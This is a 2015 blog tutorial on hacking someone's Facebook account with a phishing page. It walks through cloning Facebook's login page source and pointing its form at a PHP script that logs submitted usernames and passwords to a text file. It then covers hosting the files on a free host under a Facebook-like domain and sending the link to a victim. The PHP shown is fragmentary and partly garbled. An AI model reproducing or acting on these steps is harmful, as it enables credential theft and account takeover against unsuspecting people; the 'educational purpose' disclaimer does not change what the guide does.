Thursday, November 26, 2015

How to Hack Someones Facebook Account with Phishing Page

How to Hack Someones Facebook Account with Phishing Page
How to Hack Someones Facebook Account Through Phishing Step By Step Tutorial 
What is Phishing?

Phishing is a fraudulent attempt to acquire information such as usernames, passwords, and credit card details by  pass oneself off as a trustworthy entity in an electronic communication.
Cyber-criminals form Fake emails, Fake websites, Fake pages of popular social web sites, auction sites, banks, online payment processors to lure victims.They use SPAM, malicious Web sites, email messages and instant messages to trick people into divulging sensitive information, such as bank and credit card accounts.
Phishing emails usually appear to come from a well-known organization and ask for your personal information or ask you to click a link that takes you to a site where your personal information is requested.Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies.

Facebook Hacking

Facebook is a largest and most popular social network around the world but also most targeted as well. Hacking a Facebook account always sounds very interesting to everyone. Everyone loves to Hacks. Hackers used various methods to exploit any one’s facebook account and today we will learn facebook hacking. Phishing Webpage is An easy way to Hack Facebook Account.

Note:Phishing is a illegal activity so don’t try on anyone.This tutorial is for educational purpose. Try it on your own Risk.


  • You can follow below process for creating phishing files and you can also direct download files from here
  • Go to Facebook website and then right click and click view page source. You can do it simply pressing Ctrl+ U. New tab will open. Copy all the texts from there.
How to Hack Someones Facebook Account with Phishing Page
Facebook Page
How to Hack Someones Facebook Account with Phishing Page
Page Source

  • Now open notepad and paste all the text here. 
  • Press CTRL+F,and type "action" in search bar.
  • you will have to find a text like "action="" .
How to Hack Someones Facebook Account with Phishing Page
Find Action in Search bar
  • Chage this text action="" with this action="post.php" 
  • Save this file in a folder and rename notpad file as "index.htm" or "index.html". Now your phishing page is ready.
How to Hack Someones Facebook Account with Phishing Page
Click on Save as
  • Rename the file "index.html" 
  • Select the All files
  • Select UTF-8
How to Hack Someones Facebook Account with Phishing Page
Select the setting shown in Image

  • Now you have to create a php file which will redirect your phishing page to original facebook website.
  • Copy below text in notepad  and save as "post.php"

header ('Location:');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "rn");
fwrite($handle, "rn");
You can also download both files from here. Click here to direct download.
  • You have two files now one is "index.html" and another is :post.php", Remember file extension is important.  
  • Now you have to upload these files in a web hosting site ,i prefer u to use
  • You have to make a account in After that it looks like a picture given below.
  • be careful while selecting a domain name. it should be matching with original facebook domain i.e
  • Fill the Sign Up Form and open the given Email and and click the conformation code send by 000webhost.
  • Click on Refresh Status 
  • Then Click on " Go to C Panel"
How to Hack Someones Facebook Account with Phishing Page
Click on Cpanel
  • Now go  to control pannel,and then click  on file manager.
    How to Hack Someones Facebook Account with Phishing Page
    File manger
  • After that a new tab will pop up.Now go to public html.
How to Hack Someones Facebook Account with Phishing Page
Public HTML
  • Delete the file named default.php, after that upload two files index.html and post.php one by  one.
  • Copy the your domain name url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.
  • Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
  • Click on view now u will have your friend’s password and email id.
Note:Phishing is a illegal activity so don’t try on anyone.This tutorial is for educational purpose. Try it on your own Risk.

Step By Step Guide Video Tutorial 

how to hack someone's facebook account with... by khurramaakash

If You Facing any Problem and If you have any queries or want to add your tip, let me know via comments.If you find the information in this post useful, please share it with your friends and colleagues on Facebook, Twitter and Google Plus.

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